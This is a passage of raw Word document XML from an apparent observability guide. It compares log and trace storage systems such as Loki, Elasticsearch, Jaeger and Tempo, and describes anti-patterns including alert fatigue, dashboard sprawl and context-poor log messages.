              <w:t>InfluxDB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739CD4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Push-based, IoT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5444F0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Custom metrics, IoT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="293643E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F15477" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Datadog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420A03" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>SaaS, fully managed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86D215" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Teams wanting zero infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21D89BD6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Log Storage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68"/>
        <w:gridCol w:w="3624"/>
        <w:gridCol w:w="3258"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="5C92C20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DF3830" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>System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7B3BF0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Model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B7505C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="25DE591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2A298A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Elasticsearch (ELK)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883FF1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Full-text inverted index</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09CBDB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Complex queries, high cardinality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="1C55DFB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0C9A99" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Grafana Loki</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93D838" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Label-indexed, chunks in object storage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DAA0C1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Cost-effective, Grafana integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="4454634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74FE0C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Splunk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42E888" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Proprietary, SaaS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DF5889" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Enterprise, compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="51D1816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7156A8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>ClickHouse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167041" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Columnar analytics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DD45F4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>High-volume structured logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="758B114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5E0523" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>AWS CloudWatch Logs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F7FCCF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Managed, AWS-native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AA7D06" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>AWS workloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73223F7B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Loki's efficiency model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA538A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F93805E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Traditional (Elasticsearch):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B06891" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Index EVERY field of every log line → massive index → expensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A87B62" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Enables: arbitrary full-text queries on any field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24925058" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="1C210F78" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Loki:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5B3DB8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Index ONLY labels (service, pod, level) → tiny index → cheap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B8E7E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Log content stored as compressed chunks in S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717638A9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Queries: filter by labels (fast) → then grep content (slower for full-text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6890C5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986CCA1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  10-100x cheaper than Elasticsearch for log storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53650804" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Trade-off: slower for arbitrary full-text search (must scan chunks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F15EE3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Good enough for: "Show me ERROR logs from payment-service in the last hour"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D217B5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Trace Storage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84"/>
        <w:gridCol w:w="4057"/>
        <w:gridCol w:w="3409"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="164582D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E47483" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>System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56A5DF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Model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264583" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="0EF0874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B93A31" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Jaeger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FA133C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Cassandra/Elasticsearch backend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C0CFCB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Self-hosted, CNCF standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="140FFF7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824AD1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Grafana Tempo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7D0B37" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Object storage (S3/GCS), trace-id only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242E45" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Cost-effective, Grafana ecosystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="79976B6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C8F99C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Zipkin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1CAD09" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>In-memory / Cassandra / Elasticsearch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272A89" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Simpler, lighter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="130D195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008A57" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>AWS X-Ray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C802BF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Managed, AWS-native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1E3CBE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>AWS services integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="0D1A0AC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911F86" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Datadog APM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73557B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>SaaS, fully managed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A34EFC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Full-stack correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="3D5752A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1BC64A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Honeycomb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92CA7E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Columnar store, high-cardinality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6F13CD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Ad-hoc investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A0A8677" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="6C6713C4">
          <v:rect id="_x0000_i6137" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D56D1A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Observability Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C77188" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Alert Fatigue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B6E9B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF286B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Problem: 500 alerts per week, 90% are non-actionable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE713A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Engineers learn to ignore ALL alerts (including real ones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3AAE89" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1546B056" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7A2BD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Alerting on causes instead of symptoms (CPU &gt; 80%, disk &gt; 70%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B2225" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Thresholds too sensitive (any brief spike triggers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39DE73" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - No deduplication/grouping (same issue generates 50 alerts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617C91A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Alerts without runbooks (alert fires, nobody knows what to do)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698AD6CA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5EF640" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19BA2F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Only page for user-impacting symptoms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32087B1C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Use burn-rate alerts (SLO-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67B984" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Every alert must have a runbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4844B659" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Regularly review alert volume (target: &lt; 10 pages/week)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F14536B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - If alert isn't actionable → delete it or downgrade to informational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0F69B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Dashboard Sprawl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00915DC5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C710A7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Problem: 300 dashboards, nobody knows which to look at.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6B873" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Nobody maintains them. Half show stale/broken panels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EFAA7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92C190" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18BCE7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Standardized templates per service type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13D30B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Limit to 3-4 levels (overview → service → debug → infra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269420D8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Owner for each dashboard (delete if unowned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBCBBC3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Link from alerts to relevant dashboard (guided investigation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327BF1A5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Missing Context in Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F21D8F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64CFE3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>BAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88289A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "Error processing request"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8AA6F1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  (Which request? Which user? Which service instance? What error?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78331CED" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="5BE9A4D6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>GOOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D657F95" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  {"level":"ERROR", "msg":"Payment failed", "trace_id":"abc123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC48CD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   "user_id":"42", "order_id":"789", "error":"stripe_timeout",</w:t>
      </w:r>
    </w:p>
